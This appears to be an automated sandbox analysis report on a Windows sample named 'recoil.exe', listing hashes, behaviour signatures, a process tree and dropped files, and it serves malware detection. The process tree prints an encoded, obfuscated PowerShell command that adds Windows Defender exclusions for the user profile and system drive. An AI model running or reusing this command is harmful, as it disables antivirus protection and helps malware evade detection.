Overview

overview

10

Static

static

3

recoil.exe

windows7-x64

7

recoil.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    28-10-2024 19:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    recoil.exe

  • Size

    14.9MB

  • MD5

    70ea3adb75835187756a48c740cf720c

  • SHA1

    4db1692b7964bee36d6263b86a00bbeee5d7e491

  • SHA256

    31757f7f9c2d5853f1dd12aff97844d8daebf2af0c806d92c006ccdb9b02126b

  • SHA512

    a386d10e5e91a8bf8176f9bc385a3ad072fc72fd2458729fb5c84d42b2cf453dc6e1a34e2d69796081a86845fe89638eea014dc65d682ff53acb8bdc28c1f261

  • SSDEEP

    393216:XwJhlgWrYmEmiJc2A11sYR1PmCt++iI3XR+:XwruWTitA11r1+I++iI3XR+

Score
7/10
defense_evasiondiscoverypyinstallerupx

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 10 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\recoil.exe
    "C:\Users\Admin\AppData\Local\Temp\recoil.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQBlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAaQByACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2204
    • C:\Users\Admin\AppData\Local\Temp\Recoil App.exe
      "C:\Users\Admin\AppData\Local\Temp\Recoil App.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of SetWindowsHookEx
      PID:1620
    • C:\Users\Admin\AppData\Local\Temp\warden.exe
      "C:\Users\Admin\AppData\Local\Temp\warden.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Users\Admin\AppData\Local\Temp\warden.exe
        "C:\Users\Admin\AppData\Local\Temp\warden.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2108

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-file-l1-2-0.dll
    Filesize

    21KB

    MD5

    4a060eec454c222a5381cd359dc00b81

    SHA1

    21e1bc115d04a74779e955ea16a16bd71454d9bb

    SHA256

    e6b2b05e14a6c6f5381e8f4c7f4fd28a499246fb4c8eafe1f08014b9273d70df

    SHA512

    16fb1f4ccdad05d07feb62e0cd078401f4023f9fab0fb15e52b927ca413e65eb32c2932ba59dbfa7f7ee0e8a8053748e27f2757e82e600db812271aa44a9433c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-file-l2-1-0.dll
    Filesize

    20KB

    MD5

    50abf0a7ee67f00f247bada185a7661c

    SHA1

    0cddac9ac4db3bf10a11d4b79085ef9cb3fb84a1

    SHA256

    f957a4c261506484b53534a9be8931c02ec1a349b3f431a858f8215cecfec3f7

    SHA512

    c2694bb5d103baff1264926a04d2f0fe156b8815a23c3748412a81cc307b71a9236a0e974b5549321014065e393d10228a0f0004df9ba677f03b5d244a64b528

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-localization-l1-2-0.dll
    Filesize

    21KB

    MD5

    4c26932f8f1f490017add31f5ec0a533

    SHA1

    0da01a7c89b506fe3fd939344bb51b976efb3207

    SHA256

    dd3843c2e46b4e926c36150d614efe02ca0ebc1f767f64f471568adc35c2ef23

    SHA512

    eb2b87d187991fdc8e3a6577f20622d2d4a2a994dd375d8c27e1434ce786596533eacfbde8714db9959d88d6bcb91fdc8079c60c23f0eb920ba45c546a44e523

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-processthreads-l1-1-1.dll
    Filesize

    21KB

    MD5

    a6776c201baae1dd6f88048d7747d14c

    SHA1

    646119d2e440e6dad0ffb0fe449ab4fc27f09fbe

    SHA256

    ee99af71c347ff53c4e15109cb597759e657a3e859d9530680eeea8bb0540112

    SHA512

    a9137af8529fd96dbba22c5179a16d112ec0bfab9792babe0a9f1cca27408eff73ba89f498cb5f941a5aa44555529ee10484e6ca4a3fbf1627523acfde622b45

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\python311.dll
    Filesize

    1.6MB

    MD5

    db09c9bbec6134db1766d369c339a0a1

    SHA1

    c156d9f2d0e80b4cf41794cd9b8b1e8a352e0a0b

    SHA256

    b1aac1e461174bbae952434e4dac092590d72b9832a04457c94bd9bb7ee8ad79

    SHA512

    653a7fff6a2b6bffb9ea2c0b72ddb83c9c53d555e798eea47101b0d932358180a01af2b9dab9c27723057439c1eaffb8d84b9b41f6f9cd1c3c934f1794104d45

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\ucrtbase.dll
    Filesize

    1.1MB

    MD5

    3b337c2d41069b0a1e43e30f891c3813

    SHA1

    ebee2827b5cb153cbbb51c9718da1549fa80fc5c

    SHA256

    c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7

    SHA512

    fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499

    Download Submit

  • \Users\Admin\AppData\Local\Temp\Recoil App.exe
    Filesize

    3.2MB

    MD5

    acf8907ce64638007fb5514265812c67

    SHA1

    daa5404df21afc0cbfc126b9544fa68f3833e3f8

    SHA256

    9fe5fb74600e204a4739a0ed262f16ab6c7eb9f970f61d6315a8e5010f9bc3d4

    SHA512

    aa7478af047621b9f6d828356a20905f46a520cf364bc639ff0c21b5e9ae8eb29d5edcb2dd00c4dc327ca5348868d754c7068aff132d27d21e606e3ff821f9b6

    Download Submit

  • \Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-timezone-l1-1-0.dll
    Filesize

    21KB

    MD5

    10d466341e7ece8cf75b5d026105741b

    SHA1

    31d1e9b9a4511156695b5aa33d65b6a36f8139c2

    SHA256

    5ce391edb33c7055e724a4c3cecc64d16ba2aa4724cb99cd5aed00b0cecfbc82

    SHA512

    8778fd10c7360bd87db048a2b2ca6603455fd8cb4d0e18709f106b55db7cc92e7d6dc45385ff9def445b368376462e7d253442728d5e759faa97299b67a59e21

    Download Submit

  • \Users\Admin\AppData\Local\Temp\warden.exe
    Filesize

    11.7MB

    MD5

    066c85a9a0f70d780afc130fd6982dee

    SHA1

    09f20277c3776e23dccaa60e5fe6e9d35af4a6e6

    SHA256

    5416685eb0b64edd1e42fc96ee9365e0108f40889d4af3ee1a8598d1bfbaf02f

    SHA512

    4724721c07ac70ba90c949b86ce5d6e0f8f9a1b0a7c8ce801bb9b55f7cf377c2a7e84b84b84e0f72b29a413accec541c4a9d588ef39834b09975139d18227bfc

    Download Submit

  • memory/1620-118-0x0000000003FE0000-0x0000000003FE2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1620-119-0x0000000000100000-0x0000000000452000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1620-199-0x0000000000100000-0x0000000000452000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/2108-116-0x000007FEF6580000-0x000007FEF6B68000-memory.dmp

    Filesize

    5.9MB

    Download